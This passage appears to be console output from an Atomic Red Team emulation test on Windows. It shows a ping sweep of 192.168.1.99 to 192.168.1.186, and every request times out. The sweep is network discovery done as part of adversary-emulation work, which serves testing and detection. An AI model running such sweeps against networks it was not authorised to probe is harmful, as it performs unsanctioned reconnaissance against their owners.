4141 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4142
4143C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.99
4144
4145Pinging 192.168.1.99 with 32 bytes of data:
4146Request timed out.
4147
4148Ping statistics for 192.168.1.99:
4149 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4150
4151C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.100
4152
4153Pinging 192.168.1.100 with 32 bytes of data:
4154Request timed out.
4155
4156Ping statistics for 192.168.1.100:
4157 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4158
4159C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.101
4160
4161Pinging 192.168.1.101 with 32 bytes of data:
4162Request timed out.
4163
4164Ping statistics for 192.168.1.101:
4165 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4166
4167C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.102
4168
4169Pinging 192.168.1.102 with 32 bytes of data:
4170Request timed out.
4171
4172Ping statistics for 192.168.1.102:
4173 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4174
4175C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.103
4176
4177Pinging 192.168.1.103 with 32 bytes of data:
4178Request timed out.
4179
4180Ping statistics for 192.168.1.103:
4181 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4182
4183C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.104
4184
4185Pinging 192.168.1.104 with 32 bytes of data:
4186Request timed out.
4187
4188Ping statistics for 192.168.1.104:
4189 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4190
4191C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.105
4192
4193Pinging 192.168.1.105 with 32 bytes of data:
4194Request timed out.
4195
4196Ping statistics for 192.168.1.105:
4197 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4198
4199C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.106
4200
4201Pinging 192.168.1.106 with 32 bytes of data:
4202Request timed out.
4203
4204Ping statistics for 192.168.1.106:
4205 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4206
4207C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.107
4208
4209Pinging 192.168.1.107 with 32 bytes of data:
4210Request timed out.
4211
4212Ping statistics for 192.168.1.107:
4213 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4214
4215C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.108
4216
4217Pinging 192.168.1.108 with 32 bytes of data:
4218Request timed out.
4219
4220Ping statistics for 192.168.1.108:
4221 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4222
4223C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.109
4224
4225Pinging 192.168.1.109 with 32 bytes of data:
4226Request timed out.
4227
4228Ping statistics for 192.168.1.109:
4229 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4230
4231C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.110
4232
4233Pinging 192.168.1.110 with 32 bytes of data:
4234Request timed out.
4235
4236Ping statistics for 192.168.1.110:
4237 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4238
4239C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.111
4240
4241Pinging 192.168.1.111 with 32 bytes of data:
4242Request timed out.
4243
4244Ping statistics for 192.168.1.111:
4245 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4246
4247C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.112
4248
4249Pinging 192.168.1.112 with 32 bytes of data:
4250Request timed out.
4251
4252Ping statistics for 192.168.1.112:
4253 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4254
4255C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.113
4256
4257Pinging 192.168.1.113 with 32 bytes of data:
4258Request timed out.
4259
4260Ping statistics for 192.168.1.113:
4261 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4262
4263C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.114
4264
4265Pinging 192.168.1.114 with 32 bytes of data:
4266Request timed out.
4267
4268Ping statistics for 192.168.1.114:
4269 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4270
4271C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.115
4272
4273Pinging 192.168.1.115 with 32 bytes of data:
4274Request timed out.
4275
4276Ping statistics for 192.168.1.115:
4277 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4278
4279C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.116
4280
4281Pinging 192.168.1.116 with 32 bytes of data:
4282Request timed out.
4283
4284Ping statistics for 192.168.1.116:
4285 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4286
4287C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.117
4288
4289Pinging 192.168.1.117 with 32 bytes of data:
4290Request timed out.
4291
4292Ping statistics for 192.168.1.117:
4293 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4294
4295C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.118
4296
4297Pinging 192.168.1.118 with 32 bytes of data:
4298Request timed out.
4299
4300Ping statistics for 192.168.1.118:
4301 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4302
4303C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.119
4304
4305Pinging 192.168.1.119 with 32 bytes of data:
4306Request timed out.
4307
4308Ping statistics for 192.168.1.119:
4309 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4310
4311C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.120
4312
4313Pinging 192.168.1.120 with 32 bytes of data:
4314Request timed out.
4315
4316Ping statistics for 192.168.1.120:
4317 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4318
4319C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.121
4320
4321Pinging 192.168.1.121 with 32 bytes of data:
4322Request timed out.
4323
4324Ping statistics for 192.168.1.121:
4325 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4326
4327C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.122
4328
4329Pinging 192.168.1.122 with 32 bytes of data:
4330Request timed out.
4331
4332Ping statistics for 192.168.1.122:
4333 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4334
4335C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.123
4336
4337Pinging 192.168.1.123 with 32 bytes of data:
4338Request timed out.
4339
4340Ping statistics for 192.168.1.123:
4341 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4342
4343C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.124
4344
4345Pinging 192.168.1.124 with 32 bytes of data:
4346Request timed out.
4347
4348Ping statistics for 192.168.1.124:
4349 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4350
4351C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.125
4352
4353Pinging 192.168.1.125 with 32 bytes of data:
4354Request timed out.
4355
4356Ping statistics for 192.168.1.125:
4357 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4358
4359C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.126
4360
4361Pinging 192.168.1.126 with 32 bytes of data:
4362Request timed out.
4363
4364Ping statistics for 192.168.1.126:
4365 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4366
4367C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.127
4368
4369Pinging 192.168.1.127 with 32 bytes of data:
4370Request timed out.
4371
4372Ping statistics for 192.168.1.127:
4373 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4374
4375C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.128
4376
4377Pinging 192.168.1.128 with 32 bytes of data:
4378Request timed out.
4379
4380Ping statistics for 192.168.1.128:
4381 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4382
4383C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.129
4384
4385Pinging 192.168.1.129 with 32 bytes of data:
4386Request timed out.
4387
4388Ping statistics for 192.168.1.129:
4389 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4390
4391C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.130
4392
4393Pinging 192.168.1.130 with 32 bytes of data:
4394Request timed out.
4395
4396Ping statistics for 192.168.1.130:
4397 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4398
4399C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.131
4400
4401Pinging 192.168.1.131 with 32 bytes of data:
4402Request timed out.
4403
4404Ping statistics for 192.168.1.131:
4405 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4406
4407C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.132
4408
4409Pinging 192.168.1.132 with 32 bytes of data:
4410Request timed out.
4411
4412Ping statistics for 192.168.1.132:
4413 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4414
4415C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.133
4416
4417Pinging 192.168.1.133 with 32 bytes of data:
4418Request timed out.
4419
4420Ping statistics for 192.168.1.133:
4421 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4422
4423C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.134
4424
4425Pinging 192.168.1.134 with 32 bytes of data:
4426Request timed out.
4427
4428Ping statistics for 192.168.1.134:
4429 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4430
4431C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.135
4432
4433Pinging 192.168.1.135 with 32 bytes of data:
4434Request timed out.
4435
4436Ping statistics for 192.168.1.135:
4437 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4438
4439C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.136
4440
4441Pinging 192.168.1.136 with 32 bytes of data:
4442Request timed out.
4443
4444Ping statistics for 192.168.1.136:
4445 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4446
4447C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.137
4448
4449Pinging 192.168.1.137 with 32 bytes of data:
4450Request timed out.
4451
4452Ping statistics for 192.168.1.137:
4453 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4454
4455C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.138
4456
4457Pinging 192.168.1.138 with 32 bytes of data:
4458Request timed out.
4459
4460Ping statistics for 192.168.1.138:
4461 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4462
4463C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.139
4464
4465Pinging 192.168.1.139 with 32 bytes of data:
4466Request timed out.
4467
4468Ping statistics for 192.168.1.139:
4469 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4470
4471C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.140
4472
4473Pinging 192.168.1.140 with 32 bytes of data:
4474Request timed out.
4475
4476Ping statistics for 192.168.1.140:
4477 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4478
4479C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.141
4480
4481Pinging 192.168.1.141 with 32 bytes of data:
4482Request timed out.
4483
4484Ping statistics for 192.168.1.141:
4485 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4486
4487C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.142
4488
4489Pinging 192.168.1.142 with 32 bytes of data:
4490Request timed out.
4491
4492Ping statistics for 192.168.1.142:
4493 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4494
4495C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.143
4496
4497Pinging 192.168.1.143 with 32 bytes of data:
4498Request timed out.
4499
4500Ping statistics for 192.168.1.143:
4501 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4502
4503C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.144
4504
4505Pinging 192.168.1.144 with 32 bytes of data:
4506Request timed out.
4507
4508Ping statistics for 192.168.1.144:
4509 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4510
4511C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.145
4512
4513Pinging 192.168.1.145 with 32 bytes of data:
4514Request timed out.
4515
4516Ping statistics for 192.168.1.145:
4517 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4518
4519C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.146
4520
4521Pinging 192.168.1.146 with 32 bytes of data:
4522Request timed out.
4523
4524Ping statistics for 192.168.1.146:
4525 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4526
4527C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.147
4528
4529Pinging 192.168.1.147 with 32 bytes of data:
4530Request timed out.
4531
4532Ping statistics for 192.168.1.147:
4533 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4534
4535C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.148
4536
4537Pinging 192.168.1.148 with 32 bytes of data:
4538Request timed out.
4539
4540Ping statistics for 192.168.1.148:
4541 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4542
4543C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.149
4544
4545Pinging 192.168.1.149 with 32 bytes of data:
4546Request timed out.
4547
4548Ping statistics for 192.168.1.149:
4549 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4550
4551C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.150
4552
4553Pinging 192.168.1.150 with 32 bytes of data:
4554Request timed out.
4555
4556Ping statistics for 192.168.1.150:
4557 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4558
4559C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.151
4560
4561Pinging 192.168.1.151 with 32 bytes of data:
4562Request timed out.
4563
4564Ping statistics for 192.168.1.151:
4565 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4566
4567C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.152
4568
4569Pinging 192.168.1.152 with 32 bytes of data:
4570Request timed out.
4571
4572Ping statistics for 192.168.1.152:
4573 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4574
4575C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.153
4576
4577Pinging 192.168.1.153 with 32 bytes of data:
4578Request timed out.
4579
4580Ping statistics for 192.168.1.153:
4581 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4582
4583C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.154
4584
4585Pinging 192.168.1.154 with 32 bytes of data:
4586Request timed out.
4587
4588Ping statistics for 192.168.1.154:
4589 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4590
4591C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.155
4592
4593Pinging 192.168.1.155 with 32 bytes of data:
4594Request timed out.
4595
4596Ping statistics for 192.168.1.155:
4597 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4598
4599C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.156
4600
4601Pinging 192.168.1.156 with 32 bytes of data:
4602Request timed out.
4603
4604Ping statistics for 192.168.1.156:
4605 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4606
4607C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.157
4608
4609Pinging 192.168.1.157 with 32 bytes of data:
4610Request timed out.
4611
4612Ping statistics for 192.168.1.157:
4613 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4614
4615C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.158
4616
4617Pinging 192.168.1.158 with 32 bytes of data:
4618Request timed out.
4619
4620Ping statistics for 192.168.1.158:
4621 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4622
4623C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.159
4624
4625Pinging 192.168.1.159 with 32 bytes of data:
4626Request timed out.
4627
4628Ping statistics for 192.168.1.159:
4629 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4630
4631C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.160
4632
4633Pinging 192.168.1.160 with 32 bytes of data:
4634Request timed out.
4635
4636Ping statistics for 192.168.1.160:
4637 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4638
4639C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.161
4640
4641Pinging 192.168.1.161 with 32 bytes of data:
4642Request timed out.
4643
4644Ping statistics for 192.168.1.161:
4645 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4646
4647C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.162
4648
4649Pinging 192.168.1.162 with 32 bytes of data:
4650Request timed out.
4651
4652Ping statistics for 192.168.1.162:
4653 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4654
4655C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.163
4656
4657Pinging 192.168.1.163 with 32 bytes of data:
4658Request timed out.
4659
4660Ping statistics for 192.168.1.163:
4661 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4662
4663C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.164
4664
4665Pinging 192.168.1.164 with 32 bytes of data:
4666Request timed out.
4667
4668Ping statistics for 192.168.1.164:
4669 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4670
4671C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.165
4672
4673Pinging 192.168.1.165 with 32 bytes of data:
4674Request timed out.
4675
4676Ping statistics for 192.168.1.165:
4677 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4678
4679C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.166
4680
4681Pinging 192.168.1.166 with 32 bytes of data:
4682Request timed out.
4683
4684Ping statistics for 192.168.1.166:
4685 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4686
4687C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.167
4688
4689Pinging 192.168.1.167 with 32 bytes of data:
4690Request timed out.
4691
4692Ping statistics for 192.168.1.167:
4693 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4694
4695C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.168
4696
4697Pinging 192.168.1.168 with 32 bytes of data:
4698Request timed out.
4699
4700Ping statistics for 192.168.1.168:
4701 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4702
4703C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.169
4704
4705Pinging 192.168.1.169 with 32 bytes of data:
4706Request timed out.
4707
4708Ping statistics for 192.168.1.169:
4709 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4710
4711C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.170
4712
4713Pinging 192.168.1.170 with 32 bytes of data:
4714Request timed out.
4715
4716Ping statistics for 192.168.1.170:
4717 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4718
4719C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.171
4720
4721Pinging 192.168.1.171 with 32 bytes of data:
4722Request timed out.
4723
4724Ping statistics for 192.168.1.171:
4725 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4726
4727C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.172
4728
4729Pinging 192.168.1.172 with 32 bytes of data:
4730Request timed out.
4731
4732Ping statistics for 192.168.1.172:
4733 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4734
4735C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.173
4736
4737Pinging 192.168.1.173 with 32 bytes of data:
4738Request timed out.
4739
4740Ping statistics for 192.168.1.173:
4741 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4742
4743C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.174
4744
4745Pinging 192.168.1.174 with 32 bytes of data:
4746Request timed out.
4747
4748Ping statistics for 192.168.1.174:
4749 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4750
4751C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.175
4752
4753Pinging 192.168.1.175 with 32 bytes of data:
4754Request timed out.
4755
4756Ping statistics for 192.168.1.175:
4757 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4758
4759C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.176
4760
4761Pinging 192.168.1.176 with 32 bytes of data:
4762Request timed out.
4763
4764Ping statistics for 192.168.1.176:
4765 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4766
4767C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.177
4768
4769Pinging 192.168.1.177 with 32 bytes of data:
4770Request timed out.
4771
4772Ping statistics for 192.168.1.177:
4773 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4774
4775C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.178
4776
4777Pinging 192.168.1.178 with 32 bytes of data:
4778Request timed out.
4779
4780Ping statistics for 192.168.1.178:
4781 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4782
4783C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.179
4784
4785Pinging 192.168.1.179 with 32 bytes of data:
4786Request timed out.
4787
4788Ping statistics for 192.168.1.179:
4789 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4790
4791C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.180
4792
4793Pinging 192.168.1.180 with 32 bytes of data:
4794Request timed out.
4795
4796Ping statistics for 192.168.1.180:
4797 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4798
4799C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.181
4800
4801Pinging 192.168.1.181 with 32 bytes of data:
4802Request timed out.
4803
4804Ping statistics for 192.168.1.181:
4805 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4806
4807C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.182
4808
4809Pinging 192.168.1.182 with 32 bytes of data:
4810Request timed out.
4811
4812Ping statistics for 192.168.1.182:
4813 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4814
4815C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.183
4816
4817Pinging 192.168.1.183 with 32 bytes of data:
4818Request timed out.
4819
4820Ping statistics for 192.168.1.183:
4821 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4822
4823C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.184
4824
4825Pinging 192.168.1.184 with 32 bytes of data:
4826Request timed out.
4827
4828Ping statistics for 192.168.1.184:
4829 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4830
4831C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.185
4832
4833Pinging 192.168.1.185 with 32 bytes of data:
4834Request timed out.
4835
4836Ping statistics for 192.168.1.185:
4837 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4838
4839C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.186
4840
4841Pinging 192.168.1.186 with 32 bytes of data:
4842Request timed out.
4843
4844Ping statistics for 192.168.1.186:
4845 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4846
